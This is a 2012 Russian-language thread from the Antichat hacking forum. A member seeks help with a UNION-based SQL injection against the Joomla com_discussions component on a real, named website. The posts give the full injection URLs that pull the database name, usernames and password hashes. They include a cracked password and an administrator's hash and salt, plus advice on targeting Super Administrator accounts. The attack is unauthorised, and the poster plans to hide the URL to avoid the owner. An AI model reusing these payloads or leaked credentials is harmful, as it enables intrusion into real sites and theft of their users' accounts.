ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   com_discussions Joomla (https://forum.antichat.xyz/showthread.php?t=338313)

Cmexo3aBp 20.06.2012 15:01

Вообщем мне требуется помощь. Я немого не допонимаю суть SQL инъекций видимо просто но все же опишу свою проблему и буду рад если кто поможет дельными советами.

Есть пациент:

Цитата:

Сообщение от None
index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1

НАм требуется узнать имя базы данных в которой лежат Логин и пароль администратора делаю это вот так:

Цитата:

Сообщение от None
index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1'%20union%20all%20select%20c oncat(0x7e,0x27,unhex(Hex(cast(database()%20as%20c har))),0x27,0x7e)--+a

Узнаю что название базы данных - ipenza_giperion

Далее вытаскиваем логин администратора следующим образом:

Цитата:

Сообщение от None
index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1'%20union%20all%20select%20( select%20concat(0x7e,0x27,unhex(Hex(cast(jos_users .username%20as%20char))),0x27,0x7e)%20from%20`ipen za_giperion`.jos_users%20Order%20by%20username%20l imit%200,1)%20--+a

Узнаю что он у нас оказывается: Trav

Далее вытаскиваем пасс ( он вроде как должен быть в хэше)

Цитата:

Сообщение от None
/index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1'%20union%20all%20select%20( select%20concat(0x7e,0x27,unhex(Hex(cast(jos_users .password%20as%20char))),0x27,0x7e)%20from%20`ipen za_giperion`.jos_users%20Order%20by%20username%20l imit%200,1)%20--+a#

Наш пароль зашифрован и выглядит вот так: 404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3qsZ4eIP IBYoQ2j4denG7nM

После долгих изучений как расшифровать пароли решил попробывать перебором в пассвордпро .... и о софтинка помогла и разгадала пароль...

Итак что имеем:

Логин Администратора: Trav

Пароль Администратора: 489341282

Заходим в http:///administrator/ вводим то что нашли ....ииииии как нистранно неподходит что то....

Вот где я ошибся ?

Mr.Snuffer 20.06.2012 15:12

Цитата:

Сообщение от Cmexo3aBp
Вообщем мне требуется помощь. Я немого не допонимаю суть SQL инъекций видимо просто но все же опишу свою проблему и буду рад если кто поможет дельными советами.
Есть пациент:
НАм требуется узнать имя базы данных в которой лежат Логин и пароль администратора делаю это вот так:
Узнаю что название базы данных - ipenza_giperion
Далее вытаскиваем логин администратора следующим образом:
Узнаю что он у нас оказывается: Trav
Далее вытаскиваем пасс ( он вроде как должен быть в хэше)
Наш пароль зашифрован и выглядит вот так: 404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3qsZ4eIP IBYoQ2j4denG7nM
После долгих изучений как расшифровать пароли решил попробывать перебором в пассвордпро .... и о софтинка помогла и разгадала пароль...
Итак что имеем:
Логин Администратора: Trav
Пароль Администратора: 489341282
Заходим в http://giperion.pro/administrator/ вводим то что нашли ....ииииии как нистранно неподходит что то....
Вот где я ошибся ?

Где ты умудрился такой пасс раздекодить? oO

попугай 20.06.2012 15:13

concat_ws(0x3a,username,password)

вместо отдельных jos_users.password и jos_users.username

Cmexo3aBp 20.06.2012 15:14

http://gyazo.com/35835a929aaea293e40...png?1340186457

Ну как то так получилось

Cmexo3aBp 20.06.2012 15:20

Цитата:

Сообщение от попугай
concat_ws(0x3a,username,password)
вместо отдельных jos_users.password и jos_users.username

Огромное спасибо оказывается все чуть попроще можно сделать было. Но сути не поменяло это

Цитата:

Сообщение от None
option=com_discussions&view=thread&catid=14%3Abers erk&thread=1'%20union%20all%20select%20(select%20c oncat_ws(0x3a,username,password)%20from%20`ipenza_ giperion`.jos_users%20Order%20by%20username%20limi t%200,1)%20--+a%200,1)%20--+a

Вот запрос который вы предложили.

Получил я на него следующее:

.Trav.:404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3 qsZ4eIPIBYoQ2j4denG7nM

Хэш тот же самый пароль следовательно такой же и все так же он не подходит в админку

Однако доступ на форум я получил. Следовательно я считаю что пароль и логин этот от учетной записи на форуме. Но в упор не понимаю как вытащить пароль и логин от админки.

Cmexo3aBp 20.06.2012 15:26

Цитата:

Сообщение от Nightmarе
admin:295cf2af1b061ba92e177c9142b5a158:0Nk1f1OCEPN vSCWl8c9JgQeZSO8Hygty:Super Administrator
Пояснение:
Админа жумлы мы выводим запросом: where usertype='Super Administrator'
а не первого попавшегося лимитом.

Тьфу блин..... Преблагодарен вам очень.

попугай 20.06.2012 15:26

Цитата:

Сообщение от Cmexo3aBp
Огромное спасибо
оказывается все чуть попроще можно сделать было. Но сути не поменяло это
Вот запрос который вы предложили.
Получил я на него следующее:
.Trav.:404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3 qsZ4eIPIBYoQ2j4denG7nM
Хэш тот же самый пароль следовательно такой же и все так же он не подходит в админку

Значит это не админский акк. Так как ты упорядочил по username.

20Order%20by%20username

То, вначале тебе вывелся этот юзер с точкой в нике.

Убери упорядочение или выведи непосредственно админов. при помощи

where usertype like '%admin%'

Cmexo3aBp 20.06.2012 15:36

http://gyazo.com/66217d4a031316f6ae037bed425ffd56

Вы апсолютно правы. Спасибо огромное за помощь. Подотру урл сайта дабы избежать конфликтов с владельцем.


Время: 20:35